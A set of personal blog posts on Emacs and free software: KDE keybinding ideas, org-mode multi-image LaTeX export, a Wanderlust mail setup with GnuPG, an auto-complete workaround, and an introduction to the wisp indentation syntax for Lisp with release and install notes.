using-emacs-macros-to-reduce-tedious-work-screencast.org397 Bytes

Wish: KDE with Emacs-style keyboard shortcuts

I would love to be able to use KDE with emacs-style keyboard shortcuts, because Emacs offers a huge set of already clearly defined shortcuts for many different situations. Since its users tend to do very much with the keyboard alone, even more obscure tasks are available via shortcuts.

I think that this would be useful, because Emacs is like a kind of nongraphical desktop environment itself (just look at emacspeak!). For all those who use Emacs in a KDE environment, it could be a nice timesaver to be able to just use their accustomed bindings.

It also has a mostly clean structure for the bindings:

  • "C-x anything" does changes which affect things outside the content of the current buffer.
  • "C-c anything" is kept for specific actions of programs. For example "C-c C-c" in an email sends the email, while "C-c C-c" in a version tracking commit message finishes the message and starts the actual commit.
  • "C-anything but x or c" acts on the content you're currently editing.
  • "M-x" opens a 'command-selection-dialog' (just like alt-f2). You can run commands by name.
  • "M-anything but x" is a different flavor of "C-anything but x or c". For example "C-f" moves the cursor one character forward, while "M-f" moves one word forward. "C-v" moves one page forward, while "M-v" moves one page backwards.

On the backend side, this would require being able to define multistep shortcuts. Everything else is just porting the emacs shortcuts to KDE actions.

The actual porting of shortcuts would then require mapping of the Emacs commands to KDE actions.

Some examples:

  • "C-s" searches in a file. Replaces C-f.
  • "C-r" searches backwards.
  • "C-x C-s" saves a file -> close. Replaces C-w.
  • "C-x C-f" opens a file -> Open. Replaces C-o.
  • "C-x C-c" closes the program -> quit. Replaces C-q.
  • "C-x C-b" switches between buffers/files/tabs -> switch the open file. Replaces alt-right_arrow and a few other (to my knowledge) inconsistent bindings.
  • "C-x C-2" splits a window (or part of a window) vertically. "C-x C-o" switches between the parts. "C-x C-1" undoes the split and keeps the currently selected part. "C-x C-0" undoes the split and hides the currently selected part.

Write multiple images on a single page in org-mode.

How to add show multiple images on one page in the latex-export of emacs org-mode. I had this problem. This is my current solution.


1 Prep

Use the package subfig:

#+latex_header: \usepackage{subfig}

And create an image:

import pylab as pl
import numpy as np
x = np.random.random(size=(2,1000))
pl.scatter(x[0,:], x[1,:], marker=".")
pl.savefig("test.png")
print "\label{fig:image}"
print "[[./test.png]]"

\label{fig:image} test.png

Image: \ref{fig:image}

2 Multiple images on one page in LaTeX

#+BEGIN_LaTeX
\begin{figure}\centering
\subfloat[A gull]{\label{fig:latex-gull} 
\includegraphics[width=0.3\textwidth]{test}
} 
\subfloat[A tiger]{\label{fig:latex-tiger} 
\includegraphics[width=0.3\textwidth]{test}
} 
\subfloat[A mouse]{\label{fig:latex-mouse} 
\includegraphics[width=0.3\textwidth]{test}
}
\caption{Multiple pictures}\label{fig:latex-animals}
\end{figure}
#+END_LaTeX

Latex-Animals \ref{fig:latex-animals}.

3 Multiple images on one page in org-mode

#+latex: \begin{figure}\centering
#+latex: \subfloat[A gull]{\label{fig:org-gull} 
#+attr_latex: :width 0.3\textwidth
[[./test.png]]
#+latex: }\subfloat[A tiger]{\label{fig:org-tiger} 
#+attr_latex: :width 0.3\textwidth
[[./test.png]]
#+latex: }\subfloat[A mouse]{\label{fig:org-mouse} 
#+attr_latex: :width 0.3\textwidth
[[./test.png]]
#+latex: }\caption{Multiple pictures}\label{fig:org-animals}
#+latex: \end{figure}

test.png

test.png

test.png

Org-Animals \ref{fig:org-animals}.

AnhangGröße
test.png98.4 KB
2014-01-14-Di-org-mode-multiple-images-per-page.pdf281.84 KB
2014-01-14-Di-org-mode-multiple-images-per-page.org2.48 KB

emacs wanderlust.el setup for reading kmail maildir

This is my wanderlust.el file to read kmail maildirs. You need to define every folder you want to read.

;; mode:-*-emacs-lisp-*-
;; wanderlust 
(setq 
  elmo-maildir-folder-path "~/.kde/share/apps/kmail/mail"
          ;; where i store my mail

  wl-stay-folder-window t                       ;; show the folder pane (left)
  wl-folder-window-width 25                     ;; toggle on/off with 'i'
  
  wl-smtp-posting-server "smtp.web.de"            ;; put the smtp server here
  wl-local-domain "draketo.de"          ;; put something here...
  wl-message-id-domain "web.de"     ;; ...

file continued:

  wl-from "Arne Babenhauserheide "                  ;; my From:

  ;; note: all below are dirs (Maildirs) under elmo-maildir-folder-path 
  ;; the '.'-prefix is for marking them as maildirs
  wl-fcc ".sent-mail"                       ;; sent msgs go to the "sent"-folder
  wl-fcc-force-as-read t               ;; mark sent messages as read 
  wl-default-folder ".inbox"           ;; my main inbox 
  wl-draft-folder ".drafts"            ;; store drafts in 'postponed'
  wl-trash-folder ".trash"             ;; put trash in 'trash'
  wl-spam-folder ".gruppiert/Spam"              ;; ...spam as well
  wl-queue-folder ".queue"             ;; we don't use this

  ;; check this folder periodically, and update modeline
  wl-biff-check-folder-list '(".todo") ;; check every 180 seconds
                                       ;; (default: wl-biff-check-interval)

  ;; hide many fields from message buffers
  wl-message-ignored-field-list '("^.*:")
  wl-message-visible-field-list
  '("^\\(To\\|Cc\\):"
    "^Subject:"
    "^\\(From\\|Reply-To\\):"
    "^Organization:"
    "^Message-Id:"
    "^\\(Posted\\|Date\\):"
    )
  wl-message-sort-field-list
  '("^From"
    "^Organization:"
    "^X-Attribution:"
     "^Subject"
     "^Date"
     "^To"
     "^Cc"))


; Encryption via GnuPG

(require 'mailcrypt)
 (load-library "mailcrypt") ; provides "mc-setversion"
(mc-setversion "gpg")    ; for PGP 2.6 (default); also "5.0" and "gpg"

(autoload 'mc-install-write-mode "mailcrypt" nil t)
(autoload 'mc-install-read-mode "mailcrypt" nil t)
(add-hook 'mail-mode-hook 'mc-install-write-mode)

(add-hook 'wl-summary-mode-hook 'mc-install-read-mode)
(add-hook 'wl-mail-setup-hook 'mc-install-write-mode)

;(setq mc-pgp-keydir "~/.gnupg")
;(setq mc-pgp-path "gpg")
(setq mc-encrypt-for-me t)
(setq mc-pgp-user-id "FE96C404")

(defun mc-wl-verify-signature ()
  (interactive)
  (save-window-excursion
    (wl-summary-jump-to-current-message)
    (mc-verify)))

(defun mc-wl-decrypt-message ()
  (interactive)
  (save-window-excursion
    (wl-summary-jump-to-current-message)
    (let ((inhibit-read-only t))
      (mc-decrypt))))

(eval-after-load "mailcrypt"
  '(setq mc-modes-alist
       (append
        (quote
         ((wl-draft-mode (encrypt . mc-encrypt-message)
            (sign . mc-sign-message))
          (wl-summary-mode (decrypt . mc-wl-decrypt-message)
            (verify . mc-wl-verify-signature))))
        mc-modes-alist)))


; flowed text

 ;; Reading f=f
 (autoload 'fill-flowed "flow-fill")
 (add-hook 'mime-display-text/plain-hook
          (lambda ()
            (when (string= "flowed"
                           (cdr (assoc "format"
                                       (mime-content-type-parameters
                                        (mime-entity-content-type entity)))))
              (fill-flowed))))
; writing f=f
;(mime-edit-insert-tag "text" "plain" "; format=flowed")


(provide 'private-wanderlust)

UPDATE (2012-05-07): ~/.folders

I now use a ~/.folders file, to manage my non-kmail maildir subscriptions, too. It looks like this:

.sent-mail
.~/.local/share/mail/mgl_spam   "mgl spam" 
.~/.local/share/mail/to.arne_bab    "to arne_bab"
.inbox  "inbox" 
.trash  "Trash"
..gruppiert.directory/.inbox.directory/Freunde  "Freunde"
.drafts "Drafts"
..gruppiert.directory/.alt.directory/Posteingang-2011-09-18 "2011-09-18"
.outbox

The mail in ~/.local/share/mail is fetched via fetchmail and procmail to have a really reliable mail fetching system which does not rely on a non-broken database or free space on the disk to keep working…

keep auto-complete from competing with org-mode structure-templates

For a long time it bothered me that auto-complete made it necessary for me to abort completion before being able to use org-mode templates.

I typed <s and auto-complete showed stuff like <string, forcing me to hit C-g before I could use TAB to complete the template with org-mode.

I fixed this for me by adding all the org-mode structure templates as stop-words:

;; avoid competing with org-mode templates.
(add-hook 'org-mode-hook
          (lambda ()
            (make-local-variable 'ac-stop-words)
            (loop for template in org-structure-template-alist do
                  (add-to-list 'ac-stop-words 
                               (concat "<" (car template))))))

Note, that with this snippet you will have to reopen a file if you add an org-mode template and want it recognized as stop-word in that file.

PS: I added this as bug-report to auto-complete, so with some luck you might not have to bother with this, if you’re willing to simply wait for the next release ☺

Free Software

„Free, Reliable, Ethical and Efficient“
„Frei, Robust, Ethisch und Innovativ”
„Libre, Inagotable, Bravo, Racional y Encantado“

Articles connected to Free Software (mostly as defined by the GNU Project). This is more technical than Politics and Free Licensing, though there is some overlap.

Also see my lists of articles about specific free software projects:

  • Emacs - THE Editor.
  • Freenet - Decentralized, Anonymous Communication.
  • Mercurial - Decentralized Version Control System.

There is also a German Version to this Page: Freie Software. Most articles are not translated, so the content on the german page and on the english page is very different.

wisp: Whitespace to Lisp

New version: draketo.de/software/wisp

» I love the syntax of Python, but crave the simplicity and power of Lisp.«

display "Hello World!" ↦ (display "Hello World!")
define : factorial n     (define (factorial n)            
    if : zero? n       ↦     (if (zero? n)                
       . 1                      1                      
       * n : factorial {n - 1}  (* n (factorial {n - 1}))))

Wisp basics

»ArneBab's alternate sexp syntax is best I've seen; pythonesque, hides parens but keeps power« — Christopher Webber in twitter, in identi.ca and in his blog: Wisp: Lisp, minus the parentheses
♡ wow ♡
»Wisp allows people to see code how Lispers perceive it. Its structure becomes apparent.« — Ricardo Wurmus in IRC, paraphrasing the wisp statement from his talk at FOSDEM 2019 about Guix for reproducible science in HPC.
☺ Yay! ☺
with (open-file "with.w" "r") as port
     format #t "~a\n" : read port
Familiar with-statement in 25 lines.

 ↓ skip updates ↓

Update (2020-09-15): Wisp 1.0.3 provides a wisp binary to start a wisp repl or run wisp files, builds with Guile 3, and moved to sourcehut for libre hosting: hg.sr.ht/~arnebab/wisp.
After installation, just run wisp to enter a wisp-shell (REPL).
This release also ships wisp-mode 0.2.6 (fewer autoloads), ob-wisp 0.1 (initial support for org-babel), and additional examples. New auxiliary projects include wispserve for experiments with streaming and download-mesh via Guile and wisp in conf:
conf new -l wisp PROJNAME creates an autotools project with wisp while conf new -l wisp-enter PROJAME creates a project with natural script writing and guile doctests set up. Both also install a script to run your project with minimal start time: I see 25ms to 130ms for hello world (36ms on average). The name of the script is the name of your project.
For more info about Wisp 1.0.3, see the NEWS file.
To test wisp v1.0.3, install Guile 2.0.11 or later and bootstrap wisp:

wget https://www.draketo.de/files/wisp-1.0.3.tar_.gz;
tar xf wisp-1.0.3.tar_.gz ; cd wisp-1.0.3/;
./configure; make check;
examples/newbase60.w 123

If it prints 23 (123 in NewBase60), your wisp is fully operational.
If you have additional questions, see the Frequently asked Questions (FAQ) and chat in #guile at freenode.
That’s it - have fun with wisp syntax!

Update (2019-07-16): wisp-mode 0.2.5 now provides proper indentation support in Emacs: Tab increases indentation and cycles back to zero. Shift-tab decreases indentation via previously defined indentation levels. Return preserves the indentation level (hit tab twice to go to zero indentation).
Update (2019-06-16): In c programming the uncommon way, specifically c-indent, tantalum is experimenting with combining wisp and sph-sc, which compiles scheme-like s-expressions to c. The result is a program written like this:
pre-include "stdio.h"

define (main argc argv) : int int char**
  declare i int
  printf "the number of arguments is %d\n" argc
  for : (set i 0) (< i argc) (set+ i 1)
    printf "arg %d is %s\n" (+ i 1) (array-get argv i)
  return 0 ;; code-snippet under GPLv3+
To me that looks so close to C that it took me a moment to realize that it isn’t just using a parser which allows omitting some special syntax of C, but actually an implementation of a C-generator in Scheme (similar in spirit to cython, which generates C from Python), which results in code that looks like a more regular version of C without superfluous parens. Wisp really completes the round-trip from C over Scheme to something that looks like C but has all the regularity of Scheme, because all things considered, the code example is regular wisp-code. And it is awesome to see tantalum take up the tool I created and use it to experiment with ways to program that I never even imagined! ♡
TLDR: tantalum uses wisp for code that looks like C and compiles to C but has the regularity of Scheme!
Update (2019-06-02): The repository at https://www.draketo.de/proj/wisp/ is stale at the moment, because the staticsite extension I use to update it was broken by API changes and I currently don’t have the time to fix it. Therefore until I get it fixed, the canonical repository for wisp is https://bitbucket.org/ArneBab/wisp/. I’m sorry for that. I would prefer to self-host it again, but the time to read up what i have to adjust blocks that right now (typically the actual fix only needs a few lines). A pull-request which fixes the staticsite extension for modern Mercurial would be much appreciated!
Update (2019-02-08): wisp v1.0 released as announced at FOSDEM. Wisp the language is complete:
display "Hello World!"
↦ (display "Hello World!")

And it achieves its goal:
“Wisp allows people to see code how Lispers perceive it. Its structure becomes apparent.” — Ricardo Wurmus at FOSDEM
Tooling, documentation, and porting of wisp are still work in progress, but before I go on, I want thank the people from the readable lisp project. Without our initial shared path, and without their encouragement, wisp would not be here today. Thank you! You’re awesome!
With this release it is time to put wisp to use. To start your own project, see the tutorial Starting a wisp project and the wisp tutorial. For more info, see the NEWS file. To test wisp v1.0, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-1.0.tar.gz;
tar xf wisp-1.0.tar.gz ; cd wisp-1.0/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
If you have additional questions, see the Frequently asked Questions (FAQ) and chat in #guile at freenode.
That’s it - have fun with wisp syntax!
Update (2019-01-27): wisp v0.9.9.1 released which includes the emacs support files missed in v0.9.9, but excludes unnecessary files which increased the release size from 500k to 9 MiB (it's now back at about 500k). To start your own wisp-project, see the tutorial Starting a wisp project and the wisp tutorial. For more info, see the NEWS file. To test wisp v0.9.9.1, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.9.1.tar.gz;
tar xf wisp-0.9.9.1.tar.gz ; cd wisp-0.9.9.1/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2019-01-22): wisp v0.9.9 released with support for literal arrays in Guile (needed for doctests), example start times below 100ms, ob-wisp.el for emacs org-mode babel and work on examples: network, securepassword, and downloadmesh. To start your own wisp-project, see the tutorial Starting a wisp project and the wisp tutorial. For more info, see the NEWS file. To test wisp v0.9.9, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.9.tar.gz;
tar xf wisp-0.9.9.tar.gz ; cd wisp-0.9.9/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2018-06-26): There is now a wisp tutorial for beginning programmers: “In this tutorial you will learn to write programs with wisp. It requires no prior knowledge of programming.”Learn to program with Wisp, published in With Guise and Guile
Update (2017-11-10): wisp v0.9.8 released with installation fixes (thanks to benq!). To start your own wisp-project, see the tutorial Starting a wisp project. For more info, see the NEWS file. To test wisp v0.9.8, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.8.tar.gz;
tar xf wisp-0.9.8.tar.gz ; cd wisp-0.9.8/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-10-17): wisp v0.9.7 released with bugfixes. To start your own wisp-project, see the tutorial Starting a wisp project. For more info, see the NEWS file. To test wisp v0.9.7, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.7.tar.gz;
tar xf wisp-0.9.7.tar.gz ; cd wisp-0.9.7/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-10-08): wisp v0.9.6 released with compatibility for tests on OSX and old autotools, installation to guile/site/(guile version)/language/wisp for cleaner installation, debugging and warning when using not yet defined lower indentation levels, and with wisp-scheme.scm moved to language/wisp.scm. This allows creating a wisp project by simply copying language/. A short tutorial for creating a wisp project is available at Starting a wisp project as part of With Guise and Guile. For more info, see the NEWS file. To test wisp v0.9.6, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.6.tar.gz;
tar xf wisp-0.9.6.tar.gz ; cd wisp-0.9.6/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-08-19): Thanks to tantalum, wisp is now available as package for Arch Linux: from the Arch User Repository (AUR) as guile-wisp-hg! Instructions for installing the package are provided on the AUR page in the Arch Linux wiki. Thank you, tantalum!
Update (2017-08-20): wisp v0.9.2 released with many additional examples including the proof-of-concept for a minimum ceremony dialog-based game duel.w and the datatype benchmarks in benchmark.w. For more info, see the NEWS file. To test it, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.2.tar.gz;
tar xf wisp-0.9.2.tar.gz ; cd wisp-0.9.2/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-03-18): I removed the link to Gozala’s wisp, because it was put in maintenance mode. Quite the opposite of Guile which is taking up speed and just released Guile version 2.2.0, fully compatible with wisp (though wisp helped to find and fix one compiler bug, which is something I’m really happy about ☺).
Update (2017-02-05): Allan C. Webber presented my talk Natural script writing with Guile in the Guile devroom at FOSDEM. The talk was awesome — and recorded! Enjoy Natural script writing with Guile by "pretend Arne" ☺

presentation (pdf, 16 slides) and its source (org).
Have fun with wisp syntax!
Update (2016-07-12): wisp v0.9.1 released with a fix for multiline strings and many additional examples. For more info, see the NEWS file. To test it, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.1.tar.gz;
tar xf wisp-0.9.1.tar.gz ; cd wisp-0.9.1/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2016-01-30): I presented Wisp in the Guile devroom at FOSDEM. The reception was unexpectedly positive — given some of the backlash the readable project got I expected an exceptionally sceptical audience, but people rather asked about ways to put Wisp to good use, for example in templates, whether it works in the REPL (yes, it does) and whether it could help people start into Scheme. The atmosphere in the Guile devroom was very constructive and friendly during all talks, and I’m happy I could meet the Hackers there in person. I’m definitely taking good memories with me. Sadly the video did not make it, but the schedule-page includes the presentation (pdf, 10 slides) and its source (org).
Have fun with wisp syntax!
Update (2016-01-04): Wisp is available in GNU Guix! Thanks to the package from Christopher Webber you can try Wisp easily on top of any distribution:
guix package -i guile guile-wisp
guile --language=wisp
This already gives you Wisp at the REPL (take care to follow all instructions for installing Guix on top of another distro, especially the locales).
Have fun with wisp syntax!
Update (2015-10-01): wisp v0.9.0 released which no longer depends on Python for bootstrapping releases (but ./configure still asks for it — a fix for another day). And thanks to Christopher Webber there is now a patch to install wisp within GNU Guix. For more info, see the NEWS file. To test it, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.0.tar.gz;
tar xf wisp-0.9.0.tar.gz ; cd wisp-0.9.0/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2015-09-12): wisp v0.8.6 released with fixed macros in interpreted code, chunking by top-level forms, : . parsed as nothing, ending chunks with a trailing period, updated example evolve and added examples newbase60, cli, cholesky decomposition, closure and hoist in loop. For more info, see the NEWS file.To test it, install Guile 2.0.x or 2.2.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.6.tar.gz;
tar xf wisp-0.8.6.tar.gz ; cd wisp-0.8.6/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax! And a happy time together for the ones who merge their paths today ☺
Update (2015-04-10): wisp v0.8.3 released with line information in backtraces. For more info, see the NEWS file.To test it, install Guile 2.0.x or 2.2.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.3.tar.gz;
tar xf wisp-0.8.3.tar.gz ; cd wisp-0.8.3/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w; echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2015-03-18): wisp v0.8.2 released with reader bugfixes, new examples and an updated draft for SRFI 119 (wisp). For more info, see the NEWS file.To test it, install Guile 2.0.x or 2.2.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.2.tar.gz;
tar xf wisp-0.8.2.tar.gz ; cd wisp-0.8.2/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w; echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2015-02-03): The wisp SRFI just got into draft state: SRFI-119 — on its way to an official Scheme Request For Implementation!
Update (2014-11-19): wisp v0.8.1 released with reader bugfixes. To test it, install Guile 2.0.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.1.tar.gz;
tar xf wisp-0.8.1.tar.gz ; cd wisp-0.8.1/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w; echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2014-11-06): wisp v0.8.0 released! The new parser now passes the testsuite and wisp files can be executed directly. For more details, see the NEWS file. To test it, install Guile 2.0.x and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.0.tar.gz;
tar xf wisp-0.8.0.tar.gz ; cd wisp-0.8.0/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w;
echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
On a personal note: It’s mindboggling that I could get this far! This is actually a fully bootstrapped indentation sensitive programming language with all the power of Scheme underneath, and it’s a one-person when-my-wife-and-children-sleep sideproject. The extensibility of Guile is awesome!
Update (2014-10-17): wisp v0.6.6 has a new implementation of the parser which now uses the scheme read function. `wisp-scheme.w` parses directly to a scheme syntax-tree instead of a scheme file to be more suitable to an SRFI. For more details, see the NEWS file. To test it, install Guile 2.0.x and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.6.6.tar.gz;
tar xf wisp-0.6.6.tar.gz; cd wisp-0.6.6;
./configure; make;
guile -L . --language=wisp
That’s it - have fun with wisp syntax at the REPL!
Caveat: It does not support the ' prefix yet (syntax point 4).
Update (2014-01-04): Resolved the name-clash together with Steve Purcell und Kris Jenkins: the javascript wisp-mode was renamed to wispjs-mode and wisp.el is called wisp-mode 0.1.5 again. It provides syntax highlighting for Emacs and minimal indentation support via tab. You can install it with `M-x package-install wisp-mode`
Update (2014-01-03): wisp-mode.el was renamed to wisp 0.1.4 to avoid a name clash with wisp-mode for the javascript-based wisp.
Update (2013-09-13): Wisp now has a REPL! Thanks go to GNU Guile and especially Mark Weaver, who guided me through the process (along with nalaginrut who answered my first clueless questions…).
To test the REPL, get the current code snapshot, unpack it, run ./bootstrap.sh, start guile with $ guile -L . (requires guile 2.x) and enter ,language wisp.
Example usage:
display "Hello World!\n"
then hit enter thrice.
Voilà, you have wisp at the REPL!
Caveeat: the wisp-parser is still experimental and contains known bugs. Use it for testing, but please do not rely on it for important stuff, yet.
Update (2013-09-10): wisp-guile.w can now parse itself! Bootstrapping: The magical feeling of seeing a language (dialect) grow up to live by itself: python3 wisp.py wisp-guile.w > 1 && guile 1 wisp-guile.w > 2 && guile 2 wisp-guile.w > 3 && diff 2 3. Starting today, wisp is implemented in wisp.
Update (2013-08-08): Wisp 0.3.1 released (Changelog).

Table of Contents

2 What is wisp?

Wisp is a simple preprocessor which turns indentation sensitive syntax into Lisp syntax.

The basic goal is to create the simplest possible indentation based syntax which is able to express all possibilities of Lisp.

Basically it works by inferring the parentheses of lisp by reading the indentation of lines.

It is related to SRFI-49 and the readable Lisp S-expressions Project (and actually inspired by the latter), but it tries to Keep it Simple and Stupid: wisp is a simple preprocessor which can be called by any lisp implementation to add support for indentation sensitive syntax. To repeat the initial quote:

I love the syntax of Python, but crave the simplicity and power of Lisp.

With wisp I hope to make it possible to create lisp code which is easily readable for non-programmers (and me!) and at the same time keeps the simplicity and power of Lisp.

Its main technical improvement over SRFI-49 and Project Readable is using lines prefixed by a dot (". ") to mark the continuation of the parameters of a function after intermediate function calls.

The dot-syntax means, instead of marking every function call, it marks every line which does not begin with a function call - which is the much less common case in lisp-code.

See the Updates for information how to get the current version of wisp.

Frequently asked Questions

Can this represent any Scheme code?

Yes. Wisp enables you to write arbitrary code structures using indentation. When you write code in wisp and run it with Guile, it is full Scheme code with all its capabilities.

How do Macros work with wisp?

Just like they work in Scheme code that has parentheses: Write the same structure as with Scheme but use indentation for structure instead of parentheses where that is more readable to you or your future readers. See for example the macro-writing-macro Enter in Enter three witches.

3 Wisp syntax rules

  1. A line without indentation is a function call, just as if it would start with a bracket.
    display "Hello World!"      ↦      (display "Hello World!")
    

     
  2. A line which is more indented than the previous line is a sibling to that line: It opens a new bracket.
    display                              ↦    (display
      string-append "Hello " "World!"    ↦      (string-append "Hello " "World!"))
    

     
  3. A line which is not more indented than previous line(s) closes the brackets of all previous lines which have higher or equal indentation. You should only reduce the indentation to indentation levels which were already used by parent lines, else the behaviour is undefined.
    display                              ↦    (display
      string-append "Hello " "World!"    ↦      (string-append "Hello " "World!"))
    display "Hello Again!"               ↦    (display "Hello Again!")
    

     
  4. To add any of ' , or ` to a bracket, just prefix the line with any combination of "' ", ", " or "` " (symbol followed by one space).
    ' "Hello World!"      ↦      '("Hello World!")
    

     
  5. A line whose first non-whitespace characters are a dot followed by a space (". ") does not open a new bracket: it is treated as simple continuation of the first less indented previous line. In the first line this means that this line does not start with a bracket and does not end with a bracket, just as if you had directly written it in lisp without the leading ". ".
    string-append "Hello"        ↦    (string-append "Hello"
      string-append " " "World"  ↦      (string-append " " "World")
      . "!""!")
    

     
  6. A line which contains only whitespace and a colon (":") defines an indentation level at the indentation of the colon. It opens a bracket which gets closed by the next less- or equal-indented line. If you need to use a colon by itself. you can escape it as "\:".
    let                       ↦    (let
      :                       ↦      ((msg "Hello World!"))
        msg "Hello World!"    ↦      (display msg))
      display msg             ↦      
    

     
  7. A colon sourrounded by whitespace (" : ") in a non-empty line starts a bracket which gets closed at the end of the line.
    define : hello who                    ↦    (define (hello who)
      display                             ↦      (display 
        string-append "Hello " who "!"    ↦        (string-append "Hello " who "!")))
    

     
  8. You can replace any number of consecutive initial spaces by underscores, as long as at least one whitespace is left between the underscores and any following character. You can escape initial underscores by prefixing the first one with \ ("\___ a" → "(___ a)"), if you have to use them as function names.
    define : hello who                    ↦    (define (hello who)
    _ display                             ↦      (display 
    ___ string-append "Hello " who "!"    ↦        (string-append "Hello " who "!")))
    

     

To make that easier to understand, let’s just look at the examples in more detail:

3.1 A simple top-level function call

display "Hello World!"      ↦      (display "Hello World!")

This one is easy: Just add a bracket before and after the content.

3.2 Multiple function calls

display "Hello World!"      ↦      (display "Hello World!")
display "Hello Again!"      ↦      (display "Hello Again!")

Multiple lines with the same indentation are separate function calls (except if one of them starts with ". ", see Continue arguments, shown in a few lines).

3.3 Nested function calls

display                              ↦    (display
  string-append "Hello " "World!"    ↦      (string-append "Hello " "World!"))

If a line is more indented than a previous line, it is a sibling to the previous function: The brackets of the previous function gets closed after the (last) sibling line.

3.4 Continue function arguments

By using a . followed by a space as the first non-whitespace character on a line, you can mark it as continuation of the previous less-indented line. Then it is no function call but continues the list of parameters of the funtcion.

I use a very synthetic example here to avoid introducing additional unrelated concepts.

string-append "Hello"        ↦    (string-append "Hello"
  string-append " " "World"  ↦      (string-append " " "World")
  . "!""!")

As you can see, the final "!" is not treated as a function call but as parameter to the first string-append.

This syntax extends the notion of the dot as identity function. In many lisp implementations1 we already have `(= a (. a))`.

= a        ↦    (= a
  . a      ↦      (. a))

With wisp, we extend that equality to `(= '(a b c) '((. a b c)))`.

. a b c    ↦    a b c

3.5 Double brackets (let-notation)

If you use `let`, you often need double brackets. Since using pure indentation in empty lines would be really error-prone, we need a way to mark a line as indentation level.

To add multiple brackets, we use a colon to mark an intermediate line as additional indentation level.

let                       ↦    (let
  :                       ↦      ((msg "Hello World!"))
    msg "Hello World!"    ↦      (display msg))
  display msg             ↦      

3.6 One-line function calls inline

Since we already use the colon as syntax element, we can make it possible to use it everywhere to open a bracket - even within a line containing other code. Since wide unicode characters would make it hard to find the indentation of that colon, such an inline-function call always ends at the end of the line. Practically that means, the opened bracket of an inline colon always gets closed at the end of the line.

define : hello who                            ↦    (define (hello who)
  display : string-append "Hello " who "!"    ↦      (display (string-append "Hello " who "!")))

This also allows using inline-let:

let                       ↦    (let
  : msg "Hello World!"    ↦      ((msg "Hello World!"))
  display msg             ↦      (display msg))

and can be stacked for more compact code:

let : : msg "Hello World!"     ↦    (let ((msg "Hello World!"))
  display msg                  ↦      (display msg))

3.7 Visible indentation

To make the indentation visible in non-whitespace-preserving environments like badly written html, you can replace any number of consecutive initial spaces by underscores, as long as at least one whitespace is left between the underscores and any following character. You can escape initial underscores by prefixing the first one with \ ("\___ a" → "(___ a)"), if you have to use them as function names.

define : hello who                    ↦    (define (hello who)
_ display                             ↦      (display 
___ string-append "Hello " who "!"    ↦        (string-append "Hello " who "!")))

4 Syntax justification

I do not like adding any unnecessary syntax element to lisp. So I want to show explicitely why the syntax elements are required to meet the goal of wisp: indentation-based lisp with a simple preprocessor.

4.1 . (the dot)

We have to be able to continue the arguments of a function after a call to a function, and we must be able to split the arguments over multiple lines. That’s what the leading dot allows. Also the dot at the beginning of the line as marker of the continuation of a variable list is a generalization of using the dot as identity function - which is an implementation detail in many lisps.

`(. a)` is just `a`.

So for the single variable case, this would not even need additional parsing: wisp could just parse ". a" to "(. a)" and produce the correct result in most lisps. But forcing programmers to always use separate lines for each parameter would be very inconvenient, so the definition of the dot at the beginning of the line is extended to mean “take every element in this line as parameter to the parent function”.

